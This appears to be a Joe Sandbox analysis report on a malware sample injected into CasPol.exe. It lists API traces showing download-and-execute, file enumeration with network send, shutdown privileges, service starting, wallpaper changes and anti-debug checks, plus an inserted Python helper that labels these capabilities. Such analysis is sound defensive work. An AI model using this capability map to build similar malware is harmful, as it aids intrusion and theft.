  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
  • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
• __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
• String ID:
• API String ID: 4043647387-0
• Opcode ID: 8c870fa1ddbc7ef26fe159e2ea481eb797ca588a6453dea898a82669f51445a2
• Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
• Opcode Fuzzy Hash: 8c870fa1ddbc7ef26fe159e2ea481eb797ca588a6453dea898a82669f51445a2
• Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 1000744D
• CreateFileW.KERNEL32(000000FF,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100075C9
• CloseHandle.KERNEL32(00000000), ref: 1000765E
• FindClose.KERNEL32(00000000), ref: 10007665
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: CloseFileFind$CreateFirstHandle
• String ID:
• API String ID: 3283578348-0
• Opcode ID: 59a1705bc7755bb769e0b5acb170d7105e02174513c7add7ae537a9481892608
• Instruction ID: e7c7038f638e567c979eff5cb874745e3cf8d5b40648ff69d52a7e1f1d2920ba
• Opcode Fuzzy Hash: 59a1705bc7755bb769e0b5acb170d7105e02174513c7add7ae537a9481892608
• Instruction Fuzzy Hash: 5781C370D00209EAFB10CFA4CC84BEEBBB9FF14394F610519E809E7294D775AA45CB61
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
• Opcode ID: f46ec876707130a0260c1e36ee5cf16398cc126bc88f3db2dc71360ab7e78e5c
• Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
• Opcode Fuzzy Hash: f46ec876707130a0260c1e36ee5cf16398cc126bc88f3db2dc71360ab7e78e5c
• Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
APIs
  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
• ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
• GetProcAddress.KERNEL32(00000000), ref: 00415977
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: PowrProf.dll$SetSuspendState
• API String ID: 1589313981-1420736420
APIs
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
• GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
• GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
• LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
• LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
• SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
APIs
• __EH_prolog.LIBCMT ref: 00407A91
• FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
• WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
• WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
• _free.LIBCMT ref: 00448067
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• _free.LIBCMT ref: 00448233
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DownloadExecuteFileShell
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                                                                                                                                                  • API String ID: 2825088817-4197237851
                                                                                                                                                                                                                                  • Opcode ID: 4371f63f3fe4ec0a1073940421a41f63b853e6c01c94ef678255c2defe111c5e
                                                                                                                                                                                                                                  • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4371f63f3fe4ec0a1073940421a41f63b853e6c01c94ef678255c2defe111c5e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$FirstNextsend
                                                                                                                                                                                                                                  • String ID: x@G$x@G
                                                                                                                                                                                                                                  • API String ID: 4113138495-3390264752
                                                                                                                                                                                                                                  • Opcode ID: 32f47642e896df137da13f3a14433bf094b4848cdaa96fb84e8fbcca2ccac24a
                                                                                                                                                                                                                                  • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32f47642e896df137da13f3a14433bf094b4848cdaa96fb84e8fbcca2ccac24a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                                                                    • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                                                                    • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                                                                    • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                                                                                                                                                  • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                                                                                                                  • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
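The three function blocks above carry the behaviour the report signatures describe: ShellExecuteW paired with URLDownloadToFileW (download and execute), FindFirstFileW/FindNextFileW with a send subcall (file enumeration feeding the network), and SystemParametersInfoW(0x14) together with the Control Panel\Desktop, TileWallpaper and WallpaperStyle strings (wallpaper change). The blocks built only from GetLocaleInfoW, IsValidCodePage and LIBCMT/LIBVCRUNTIME calls are statically linked C runtime start-up, not sample logic. The Python below is an added example, not Joe Sandbox output and not code from the analysed sample: it parses API lines in this report's format and maps each function to a coarse capability. The capability rules and the runtime-noise heuristic are this example's own assumptions; SPI_SETDESKWALLPAPER = 0x0014 is the documented SystemParametersInfo action code, and SAMPLE is copied from the function blocks in this section.

```python
"""Map API calls from a Joe Sandbox function block to coarse capabilities.

Added example for this report, not Joe Sandbox code and not code from the
analysed sample. The capability rules are this example's own heuristics;
SPI_SETDESKWALLPAPER == 0x0014 is the documented SystemParametersInfo
action code. SAMPLE is copied from the function blocks in this section.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SPI_SETDESKWALLPAPER = "00000014"         # uiAction as printed in the report
CRT_MODULES = {"LIBCMT", "LIBVCRUNTIME"}   # statically linked C runtime
LOCALE_APIS = {"GetLocaleInfoW", "IsValidCodePage", "GetLastError", "SetLastError"}
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")
# Matches "• Api.MODULE(args), ref: ADDR", "• _free.LIBCMT ref: ADDR" and the
# indented "• Part of subcall function ADDR: Api.MODULE(...)" variants.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?")
STRING_ID = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]   # callee address when listed as "Part of subcall function"


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)   # "String ID" entries, '$'-separated in the report


def parse_functions(text: str) -> List[Function]:
    """One Function per 'APIs' header; collects its API bullets and String ID entries."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Function()
            functions.append(current)
        elif current is not None:
            if (m := STRING_ID.match(line)):
                current.strings += [s for s in m.group("ids").split("$") if s]
            elif (m := API_LINE.match(line)):
                args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
                current.calls.append(Call(m.group("api"), m.group("mod"), args,
                                          m.group("ref") or "", m.group("sub")))
    return functions


def literal_args(fn: Function) -> List[str]:
    """Arguments that are neither 8-hex-digit values nor unresolved '?': inline strings worth pivoting on."""
    return sorted({a for c in fn.calls for a in c.args if a and a != "?" and not HEX8.match(a)})


def capabilities(fn: Function) -> set:
    """Heuristic capability labels (this example's own rules, not a Joe Sandbox signature set)."""
    apis = {c.api for c in fn.calls}
    caps = set()
    if "URLDownloadToFileW" in apis and any(a.startswith("ShellExecute") for a in apis):
        caps.add("download-and-execute")
    if {"FindFirstFileW", "FindNextFileW"} <= apis and "send" in apis:
        caps.add("file-enumeration-with-network-send")
    sets_wallpaper = any(c.api == "SystemParametersInfoW" and c.args[:1] == [SPI_SETDESKWALLPAPER]
                         for c in fn.calls)
    writes_desktop_key = ("Control Panel\\Desktop" in fn.strings
                          and any(a.startswith("RegSetValueEx") for a in apis))
    if sets_wallpaper or writes_desktop_key:
        caps.add("desktop-wallpaper-change")
    # Functions made only of CRT internals and locale lookups are runtime start-up, not sample logic.
    if fn.calls and all(c.module in CRT_MODULES or c.api in LOCALE_APIS for c in fn.calls):
        caps.add("crt-runtime-noise")
    return caps


# Copied from the function blocks in this section of the report.
SAMPLE = r"""
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
  • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
APIs
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3), ref: 00450B61
• _wcschr.LIBVCRUNTIME ref: 00450BF1
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450CA2
• String ID:
"""

if __name__ == "__main__":
    for fn in parse_functions(SAMPLE):
        print(fn.calls[0].ref, sorted(capabilities(fn)) or ["-"], literal_args(fn))
```

Run stand-alone it prints one line per function with its first call address, its labels and any inline string arguments. The crt-runtime-noise label exists so the GetLocaleInfoW/IsValidCodePage blocks can be skipped quickly; literal_args surfaces strings such as "open", "HgF" and "5.3.0 Pro" that the report shows only inside argument lists and that are useful pivots when comparing this dump with others.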
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4212172061-0
                                                                                                                                                                                                                                  • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                  • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$FirstH_prologNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 301083792-0
                                                                                                                                                                                                                                  • Opcode ID: 8170f0a72d00964befc2a0b1f28f9fe0a6cb8ce36f51d122916a28cfcbcc958f
                                                                                                                                                                                                                                  • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8170f0a72d00964befc2a0b1f28f9fe0a6cb8ce36f51d122916a28cfcbcc958f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                                                                                                                                                  APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
• Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
• Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
• Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
• Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 045761DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 045761E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 045761F1
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 7624262ef9394642279f706339d194f5e0c01008546c7a58106dbaf3b077a978
• Instruction ID: 118c36171a3fff8b800fe3725dab590abf04b730f2723f40d212ec9283e137dc
• Opcode Fuzzy Hash: 7624262ef9394642279f706339d194f5e0c01008546c7a58106dbaf3b077a978
• Instruction Fuzzy Hash: 6231E77490121DABDB21DF25E988B9DBBB8FF48310F5041EAE81CA7250E734AF859F45
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0043A755
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0043A75F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0043A76C
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
